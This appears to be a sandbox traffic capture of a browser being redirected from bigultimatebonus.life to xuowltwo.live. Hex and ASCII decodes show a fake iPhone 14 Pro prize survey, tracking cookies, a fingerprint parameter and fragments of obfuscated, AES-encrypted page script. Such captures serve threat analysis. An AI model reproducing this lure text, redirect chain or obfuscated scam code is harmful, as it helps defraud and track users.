                              2024-02-22 07:09:34 UTC710OUTGET /?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru HTTP/1.1
                              Host: bigultimatebonus.life
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:34 UTC394INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Thu, 22 Feb 2024 07:09:34 GMT
                              Content-Type: text/html
                              Content-Length: 61512
                              Connection: close
                              cache-control: private
                              set-cookie: sid=t1~h22irzseq2ep0nacjbfxeqrw; path=/
                              set-cookie: sid=t1~h22irzseq2ep0nacjbfxeqrw; path=/
                              set-cookie: p1=https://xuowltwo.live/crhhigmk/; path=/
                              set-cookie: s1=ju6whgjvkqwdsgpi; path=/
                              Cache-Control: no-transform
                              2024-02-22 07:09:34 UTC3702INData Raw: 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 72 65 71 75 65 73 74 4c 69 6e 6b 28 29 7b 72 65 74 75 72 6e 20 7b 73 65 73 73 69 6f 6e 49 64 3a 5b 27 73 69 64 27 2c 27 74 31 7e 68 32 32 69 72 7a 73 65 71 32 65 70 30 6e 61 63 6a 62 66 78 65 71 72 77 27 5d 2c 70 31 3a
                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script>function requestLink(){return {sessionId:['sid','t1~h22irzseq2ep0nacjbfxeqrw'],p1:
                              2024-02-22 07:09:34 UTC44INData Raw: 63 65 69 6c 28 73 29 3a 66 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a
                              Data Ascii: ceil(s):f.max((0|s)-this._minBufferSize,0))*
                              2024-02-22 07:09:34 UTC4096INData Raw: 6f 2c 61 3d 66 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 2c 63 29 2c 72 2e 73 69 67 42 79 74 65 73 2d 3d 61 7d 72 65 74 75 72 6e 20 6e 65 77 20 75 2e 69 6e 69 74 28 65 2c 61 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 64 61 74 61 3d 74 68 69 73 2e 5f 64 61 74 61 2e 63 6c 6f 6e 65 28 29 2c 74 7d 2c 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 3a 30 7d 29 2c 70 3d 28 65 2e 48 61 73 68 65 72 3d 68 2e 65 78 74 65 6e 64 28 7b 63 66 67 3a 6e 2e 65 78 74 65 6e
                              Data Ascii: o,a=f.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new u.init(e,a)},clone:function(){var t=n.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(e.Hasher=h.extend({cfg:n.exten
                              2024-02-22 07:09:34 UTC496INData Raw: 65 61 74 65 28 72 29 2e 63 6f 6d 70 75 74 65 28 74 2c 65 29 7d 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 43 72 79 70 74 6f 4a 53 2c 68 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 3b 74 2e 65 6e 63 2e 42 61 73 65 36 34 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 68 69 73 2e 5f 6d 61 70 3b 74 2e 63 6c 61 6d 70 28 29 3b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 72 3b 6f 2b 3d 33 29 66 6f 72 28 76 61 72 20 73 3d 28 65 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 29 3c 3c 31 36 7c 28 65 5b 6f 2b 31 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 28 6f 2b 31 29 25 34 2a 38 26 32 35 35 29 3c 3c 38 7c
                              Data Ascii: eate(r).compute(t,e)}}(),function(){var t=CryptoJS,h=t.lib.WordArray;t.enc.Base64={stringify:function(t){var e=t.words,r=t.sigBytes,i=this._map;t.clamp();for(var n=[],o=0;o<r;o+=3)for(var s=(e[o>>>2]>>>24-o%4*8&255)<<16|(e[o+1>>>2]>>>24-(o+1)%4*8&255)<<8|
                              2024-02-22 07:09:34 UTC4096INData Raw: 65 4d 61 70 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 5b 72 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 29 5d 3d 6e 7d 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 69 66 28 6f 29 7b 76 61 72 20 73 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 3b 2d 31 21 3d 3d 73 26 26 28 65 3d 73 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 69 66 28 6f 25 34 29 7b 76 61 72 20 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d
                              Data Ascii: eMap=[];for(var n=0;n<r.length;n++)i[r.charCodeAt(n)]=n}var o=r.charAt(64);if(o){var s=t.indexOf(o);-1!==s&&(e=s)}return function(t,e,r){for(var i=[],n=0,o=0;o<e;o++)if(o%4){var s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,a=s|c;i[n>>>2]|=
                              2024-02-22 07:09:34 UTC1696INData Raw: 29 2e 6b 64 66 2e 65 78 65 63 75 74 65 28 72 2c 74 2e 6b 65 79 53 69 7a 65 2c 74 2e 69 76 53 69 7a 65 29 3b 69 2e 69 76 3d 6e 2e 69 76 3b 76 61 72 20 6f 3d 67 2e 65 6e 63 72 79 70 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 65 2c 6e 2e 6b 65 79 2c 69 29 3b 72 65 74 75 72 6e 20 6f 2e 6d 69 78 49 6e 28 6e 29 2c 6f 7d 2c 64 65 63 72 79 70 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 2c 69 29 7b 69 3d 74 68 69 73 2e 63 66 67 2e 65 78 74 65 6e 64 28 69 29 2c 65 3d 74 68 69 73 2e 5f 70 61 72 73 65 28 65 2c 69 2e 66 6f 72 6d 61 74 29 3b 76 61 72 20 6e 3d 69 2e 6b 64 66 2e 65 78 65 63 75 74 65 28 72 2c 74 2e 6b 65 79 53 69 7a 65 2c 74 2e 69 76 53 69 7a 65 2c 65 2e 73 61 6c 74 29 3b 72 65 74 75 72 6e 20 69 2e 69 76 3d 6e 2e 69 76 2c 67 2e 64 65 63 72 79 70 74 2e
                              Data Ascii: ).kdf.execute(r,t.keySize,t.ivSize);i.iv=n.iv;var o=g.encrypt.call(this,t,e,n.key,i);return o.mixIn(n),o},decrypt:function(t,e,r,i){i=this.cfg.extend(i),e=this._parse(e,i.format);var n=i.kdf.execute(r,t.keySize,t.ivSize,e.salt);return i.iv=n.iv,g.decrypt.
                              2024-02-22 07:09:34 UTC4096INData Raw: 73 2e 5f 6e 52 6f 75 6e 64 73 2c 68 3d 74 5b 65 5d 5e 72 5b 30 5d 2c 66 3d 74 5b 65 2b 31 5d 5e 72 5b 31 5d 2c 75 3d 74 5b 65 2b 32 5d 5e 72 5b 32 5d 2c 70 3d 74 5b 65 2b 33 5d 5e 72 5b 33 5d 2c 64 3d 34 2c 6c 3d 31 3b 6c 3c 61 3b 6c 2b 2b 29 7b 76 61 72 20 76 3d 69 5b 68 3e 3e 3e 32 34 5d 5e 6e 5b 66 3e 3e 3e 31 36 26 32 35 35 5d 5e 6f 5b 75 3e 3e 3e 38 26 32 35 35 5d 5e 73 5b 32 35 35 26 70 5d 5e 72 5b 64 2b 2b 5d 2c 5f 3d 69 5b 66 3e 3e 3e 32 34 5d 5e 6e 5b 75 3e 3e 3e 31 36 26 32 35 35 5d 5e 6f 5b 70 3e 3e 3e 38 26 32 35 35 5d 5e 73 5b 32 35 35 26 68 5d 5e 72 5b 64 2b 2b 5d 2c 79 3d 69 5b 75 3e 3e 3e 32 34 5d 5e 6e 5b 70 3e 3e 3e 31 36 26 32 35 35 5d 5e 6f 5b 68 3e 3e 3e 38 26 32 35 35 5d 5e 73 5b 32 35 35 26 66 5d 5e 72 5b 64 2b 2b 5d 2c 67 3d 69 5b
                              Data Ascii: s._nRounds,h=t[e]^r[0],f=t[e+1]^r[1],u=t[e+2]^r[2],p=t[e+3]^r[3],d=4,l=1;l<a;l++){var v=i[h>>>24]^n[f>>>16&255]^o[u>>>8&255]^s[255&p]^r[d++],_=i[f>>>24]^n[u>>>16&255]^o[p>>>8&255]^s[255&h]^r[d++],y=i[u>>>24]^n[p>>>16&255]^o[h>>>8&255]^s[255&f]^r[d++],g=i[
                              2024-02-22 07:09:34 UTC4096INData Raw: 57 58 59 5a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 27 3b 76 61 72 20 5f 30 78 62 34 31 30 38 31 3d 27 27 2c 5f 30 78 33 65 34 66 61 38 3d 27 27 3b 66 6f 72 28 76 61 72 20 5f 30 78 34 64 66 62 62 63 3d 30 78 30 2c 5f 30 78 32 32 39 33 62 39 2c 5f 30 78 32 30 31 32 31 38 2c 5f 30 78 63 64 37 65 62 31 3d 30 78 30 3b 5f 30 78 32 30 31 32 31 38 3d 5f 30 78 34 34 30 61 62 33 5b 27 63 68 61 72 41 74 27 5d 28 5f 30 78 63 64 37 65 62 31 2b 2b 29 3b 7e 5f 30 78 32 30 31 32 31 38 26 26 28 5f 30 78 32 32 39 33 62 39 3d 5f 30 78 34 64 66 62 62 63 25 30 78 34 3f 5f 30 78 32 32 39 33 62 39 2a 30 78 34 30 2b 5f 30 78 32 30 31 32 31 38 3a 5f 30 78 32 30 31 32 31 38 2c 5f 30 78 34 64 66 62 62 63 2b 2b 25 30 78 34 29 3f 5f 30 78 62 34 31 30 38 31 2b 3d 53 74 72 69 6e 67 5b
                              Data Ascii: WXYZ0123456789+/=';var _0xb41081='',_0x3e4fa8='';for(var _0x4dfbbc=0x0,_0x2293b9,_0x201218,_0xcd7eb1=0x0;_0x201218=_0x440ab3['charAt'](_0xcd7eb1++);~_0x201218&&(_0x2293b9=_0x4dfbbc%0x4?_0x2293b9*0x40+_0x201218:_0x201218,_0x4dfbbc++%0x4)?_0xb41081+=String[
                              2024-02-22 07:09:34 UTC1944INData Raw: 57 52 4f 27 2c 27 69 38 6b 6e 57 4f 4f 27 2c 27 57 50 2f 64 4f 75 79 27 2c 27 7a 53 6b 6c 46 74 42 63 51 65 6c 63 49 78 35 52 57 34 64 63 4e 57 27 2c 27 57 35 65 42 57 4f 79 27 2c 27 6e 48 30 56 41 68 71 27 2c 27 57 50 47 44 57 34 6e 41 57 52 64 64 50 43 6f 41 57 35 7a 4c 57 51 6a 76 27 2c 27 71 43 6f 53 57 36 54 65 57 35 31 63 70 48 61 2b 57 34 65 76 57 37 68 64 55 43 6b 69 57 51 6a 43 57 52 70 63 53 6d 6b 75 27 2c 27 57 37 65 4e 67 68 78 63 49 43 6b 61 27 2c 27 57 52 4e 64 4d 32 61 43 27 2c 27 62 6d 6f 58 72 71 27 2c 27 57 51 4b 43 57 37 33 63 48 47 27 2c 27 78 6d 6b 54 57 50 4f 53 57 51 6c 63 4f 32 70 63 56 47 27 2c 27 57 4f 43 6b 57 35 48 71 57 52 64 64 55 61 27 2c 27 6e 31 6a 50 27 2c 27 57 35 7a 50 70 5a 75 34 57 34 42 63 52 61 27 2c 27 57 50 7a 6e
                              Data Ascii: WRO','i8knWOO','WP/dOuy','zSklFtBcQelcIx5RW4dcNW','W5eBWOy','nH0VAhq','WPGDW4nAWRddPCoAW5zLWQjv','qCoSW6TeW51cpHa+W4evW7hdUCkiWQjCWRpcSmku','W7eNghxcICka','WRNdM2aC','bmoXrq','WQKCW73cHG','xmkTWPOSWQlcO2pcVG','WOCkW5HqWRddUa','n1jP','W5zPpZu4W4BcRa','WPzn
                              2024-02-22 07:09:34 UTC4096INData Raw: 64 54 43 6b 46 63 53 6b 49 27 2c 27 57 35 74 63 4a 74 65 47 75 61 27 2c 27 76 38 6b 32 42 72 47 27 2c 27 76 6d 6b 7a 57 51 5a 64 48 65 65 36 57 51 43 27 2c 27 57 37 72 4b 72 74 4b 27 2c 27 6f 49 58 49 57 52 70 63 4a 58 37 63 48 57 2f 63 49 43 6b 54 67 47 27 2c 27 57 52 72 45 44 53 6b 70 27 2c 27 63 32 78 64 4b 43 6f 2f 61 61 27 2c 27 43 53 6b 68 57 51 33 64 4b 31 47 27 2c 27 57 34 61 36 57 37 54 65 79 4b 30 27 2c 27 57 36 33 63 51 71 65 27 2c 27 6c 66 35 50 57 36 6d 75 57 37 6d 27 2c 27 57 34 65 2f 57 51 64 63 4e 47 27 2c 27 57 35 33 63 50 53 6f 64 78 47 46 64 52 77 52 63 47 43 6b 4b 27 2c 27 65 4d 48 76 57 36 65 72 57 36 37 63 55 64 37 64 53 61 27 2c 27 57 36 78 64 4c 4d 47 27 2c 27 69 38 6b 6a 57 4f 4f 27 2c 27 62 53 6f 6f 57 52 64 64 49 32 4e 64 4e 64
                              Data Ascii: dTCkFcSkI','W5tcJteGua','v8k2BrG','vmkzWQZdHee6WQC','W7rKrtK','oIXIWRpcJX7cHW/cICkTgG','WRrEDSkp','c2xdKCo/aa','CSkhWQ3dK1G','W4a6W7TeyK0','W63cQqe','lf5PW6muW7m','W4e/WQdcNG','W53cPSodxGFdRwRcGCkK','eMHvW6erW67cUd7dSa','W6xdLMG','i8kjWOO','bSooWRddI2NdNd


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449738185.155.184.324433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:35 UTC742OUTGET /favicon.ico HTTP/1.1
                              Host: bigultimatebonus.life
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: sid=t1~h22irzseq2ep0nacjbfxeqrw; p1=https://xuowltwo.live/crhhigmk/; s1=ju6whgjvkqwdsgpi
                              2024-02-22 07:09:36 UTC127INHTTP/1.1 204 No Content
                              Server: nginx
                              Date: Thu, 22 Feb 2024 07:09:36 GMT
                              Connection: close
                              Cache-Control: no-transform


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449739185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:36 UTC818OUTGET /crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-Dest: document
                              Referer: https://bigultimatebonus.life/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:36 UTC166INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:36 GMT
                              Content-Type: text/html
                              Content-Length: 18845
                              Connection: close
                              cache-control: private
                              2024-02-22 07:09:36 UTC3930INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 72 65 71 75 65 73 74 4c 69 6e 6b 28 29 7b 72 65 74 75 72 6e 20 7b 73 65 73 73 69 6f 6e 49 64 3a 5b 27 73 69 64 27 2c 27 74 31 7e 68 32 32 69 72 7a 73 65 71 32 65 70 30 6e 61 63 6a 62 66 78 65 71 72 77 27 5d 7d 3b 7d 76 61 72 20 67 65 6f 49 6e 66 6f 3d 7b 22 63 63 22 3a 22 55 53 22 2c 22 63 6e 61 6d 65 73 22 3a 7b 22 64 65 22 3a 22 55 53 41 22 2c 22 65 6e 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 65 73 22 3a 22 45 73 74 61 64 6f 73 20 55 6e 69 64 6f 73 22 2c 22 66 72 22 3a 22 c3 89 74 61 74 73 20 55 6e 69 73 22 2c 22 6a 61 22 3a 22 e3 82 a2 e3 83 a1 e3 83 aa e3 82 ab 22 2c 22 70 74 2d 42 52 22 3a 22
                              Data Ascii: <!DOCTYPE html><html><head><script>function requestLink(){return {sessionId:['sid','t1~h22irzseq2ep0nacjbfxeqrw']};}var geoInfo={"cc":"US","cnames":{"de":"USA","en":"United States","es":"Estados Unidos","fr":"tats Unis","ja":"","pt-BR":"
                              2024-02-22 07:09:36 UTC19INData Raw: 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 73 73 31 31
                              Data Ascii: <div class="css11
                              2024-02-22 07:09:36 UTC4096INData Raw: 30 32 5f 31 38 20 63 73 73 31 31 30 32 5f 31 39 20 63 73 73 31 31 30 32 5f 32 30 22 20 64 61 74 61 2d 71 75 65 73 74 69 6f 6e 3d 22 31 22 20 64 61 74 61 2d 62 71 3d 22 31 22 3e 4d 61 6c 65 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 73 73 31 31 30 32 5f 31 38 20 63 73 73 31 31 30 32 5f 31 39 20 63 73 73 31 31 30 32 5f 32 30 22 20 64 61 74 61 2d 71 75 65 73 74 69 6f 6e 3d 22 31 22 20 64 61 74 61 2d 62 71 3d 22 32 22 3e 46 65 6d 61 6c 65 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 73 73 31 31 30 32 5f 31 37 22 3e 3c 73 74 72 6f 6e 67 3e 51 75 65 73 74 69 6f 6e 73 20 32 2f 34
                              Data Ascii: 02_18 css1102_19 css1102_20" data-question="1" data-bq="1">Male</div> <div class="css1102_18 css1102_19 css1102_20" data-question="1" data-bq="2">Female</div> </div> <div id="q2"> <p class="css1102_17"><strong>Questions 2/4
                              2024-02-22 07:09:36 UTC4096INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 73 73 31 31 30 32 5f 33 34 22 3e 3c 69 6d 67 20 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6d 61 69 6e 73 74 72 65 61 6d 2f 61 6c 6c 2f 61 62 2f 62 6f 78 5f 6f 70 65 6e 2e 70 6e 67 22 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 34 22 20 63 6c 61 73 73 3d 22 63 73 73 31 31 30 32 5f 33 32 20 63 73 73 31 31 30 32 5f 33 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 73 73 31 31 30 32 5f 32 38 22 3e 3c 69 6d 67 20 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6d 61 69 6e 73 74 72 65 61 6d 2f 61 6c 6c 2f 61 62 2f 74 6f 70 5f 72 65 64 2e 70 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                              Data Ascii: <div class="css1102_34"><img src="/media/mainstream/all/ab/box_open.png"> </div> </div> <div id="4" class="css1102_32 css1102_33"> <div class="css1102_28"><img src="/media/mainstream/all/ab/top_red.png"></div> <div class=
                              2024-02-22 07:09:36 UTC2192INData Raw: 61 6e 3e 2c 20 79 6f 75 20 68 61 76 65 20 61 20 63 68 61 6e 63 65 20 74 6f 20 77 69 6e 20 61 6e 20 41 70 70 6c 65 20 69 50 68 6f 6e 65 20 31 34 20 50 72 6f 21 20 3c 62 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 59 6f 75 20 6d 75 73 74 20 73 65 6c 65 63 74 20 74 68 65 20 63 6f 72 72 65 63 74 20 62 6f 78 20 77 69 74 68 20 79 6f 75 72 20 70 72 69 7a 65 20 69 6e 73 69 64 65 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 59 6f 75 20 68 61 76 65 20 33 20 61 74 74 65 6d 70 74 73 2e 20 47 6f 6f 64 20 6c 75 63 6b 21 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 70 5f 6d 6f 64 61 6c 5f 62 75 74 74 6f 6e 31 22 20 63 6c 61 73 73 3d 22 63 73 73 31 31
                              Data Ascii: an>, you have a chance to win an Apple iPhone 14 Pro! <br> <p>You must select the correct box with your prize inside.</p> <p>You have 3 attempts. Good luck!</p> <button type="button" id="p_modal_button1" class="css11
                              2024-02-22 07:09:36 UTC4096INData Raw: 6c 6f 61 74 3a 6c 65 66 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 35 30 25 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 33 62 35 39 39 38 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 22 3e 43 6f 6d 6d 65 6e 74 73 3c 2f 73 70 61 6e 3e 20 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 35 30 25 3b 63 6f 6c 6f 72 3a 23 61 38 61 37 61 37 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 22 3e 20 37 20 6f 66 20 35 38 39 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e
                              Data Ascii: loat:left;display:block;width:50%"><span style="color:#3b5998; cursor: pointer;">Comments</span> </p> <p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right"> 7 of 589</p> <div style="clear:both">
                              2024-02-22 07:09:36 UTC416INData Raw: 2f 73 70 61 6e 3e 20 c2 b7 20 3c 75 3e 36 20 68 6f 75 72 73 20 61 67 6f 3c 2f 75 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 2e 63 73 73 31 31 30 32 5f 31 38 2c 20 2e 74 65 78 74 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 38 46 30 30 7d 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 23 66 6f 6f 74 65 72 20 61 7b 0d 0a 63 6f 6c 6f 72 3a 23 45 46 45 46 45 46 3b 7d 0d 0a 3c 2f
                              Data Ascii: /span> <u>6 hours ago</u></div> </div> </div> <style type="text/css"> .css1102_18, .text-primary { background-color: #FF8F00}; } </style> </div></div><style>#footer a{color:#EFEFEF;}</


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.44974123.51.58.94443
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:36 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-22 07:09:36 UTC494INHTTP/1.1 200 OK
                              ApiVersion: Distribute 1.1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              Content-Type: application/octet-stream
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              Server: ECAcc (chd/073D)
                              X-CID: 11
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-eus-z1
                              Cache-Control: public, max-age=44166
                              Date: Thu, 22 Feb 2024 07:09:36 GMT
                              Connection: close
                              X-CID: 2


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449740185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:36 UTC702OUTGET /media/mainstream/all/ab/1102_2.css HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
